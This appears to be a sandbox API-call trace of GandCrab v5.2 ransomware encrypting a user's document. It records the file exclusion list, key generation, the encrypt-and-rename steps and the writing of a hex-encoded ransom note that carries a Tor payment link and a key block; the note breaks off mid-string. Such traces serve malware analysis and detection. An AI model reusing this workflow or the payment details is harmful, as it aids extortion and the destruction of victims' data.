[0090.103] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.103] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt.titwmvjl") returned 111 [0090.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt") returned 102 [0090.103] lstrlenW (lpString=".odt") returned 4 [0090.103] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.103] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".odt ") returned 5 [0090.103] lstrcmpiW (lpString1=".odt", lpString2=".titwmvjl") returned -1 [0090.104] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt") returned 102 [0090.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt") returned 102 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="desktop.ini") returned 1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="autorun.inf") returned 1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="ntuser.dat") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="iconcache.db") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="bootsect.bak") returned 1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="boot.ini") returned 1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="ntuser.dat.log") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="thumbs.db") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="KRAB-DECRYPT.html") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="CRAB-DECRYPT.html") returned 1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="ntldr") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="NTDETECT.COM") returned -1 [0090.104] lstrcmpiW (lpString1="eUDfQARDF6x.odt", lpString2="Bootfont.bin") returned 1 [0090.104] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt") returned 102 [0090.104] lstrlenW (lpString=".odt") returned 4 [0090.104] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.104] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".odt ") returned 5 [0090.104] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.105] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.105] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\eudfqardf6x.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0090.105] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.105] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0090.106] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.106] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.107] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.108] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.108] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.108] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0090.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.108] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.108] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.108] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.109] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.109] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.110] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.110] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0090.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.110] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.110] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.110] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.111] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037f8) returned 1 [0090.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.112] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.112] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.112] GetLastError () returned 0x0 [0090.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.112] CryptDestroyKey (hKey=0x5037f8) returned 1 [0090.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.112] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.113] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.114] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5033f8) returned 1 [0090.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.114] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.114] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.114] GetLastError () returned 0x0 [0090.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.114] CryptDestroyKey (hKey=0x5033f8) returned 1 [0090.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.115] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.115] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.115] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.115] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x10db2, lpOverlapped=0x0) returned 1 [0090.122] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffef24e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.122] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10db2, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x10db2, lpOverlapped=0x0) returned 1 [0090.123] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0090.125] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.129] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.129] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.129] CloseHandle (hObject=0x2cc) returned 1 [0090.130] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\eudfqardf6x.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\eudfqardf6x.odt.titwmvjl"), dwFlags=0x1) returned 1 [0090.131] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.131] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.131] lstrcmpW (lpString1="oT6owYuaL", lpString2=".") returned 1 [0090.131] lstrcmpW (lpString1="oT6owYuaL", lpString2="..") returned 1 [0090.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="oT6owYuaL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL" [0090.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\" [0090.131] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0090.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0090.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0090.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0090.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0090.132] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.133] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.133] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\\\TITWMVJL-DECRYPT.txt") returned 118 [0090.133] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0090.133] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x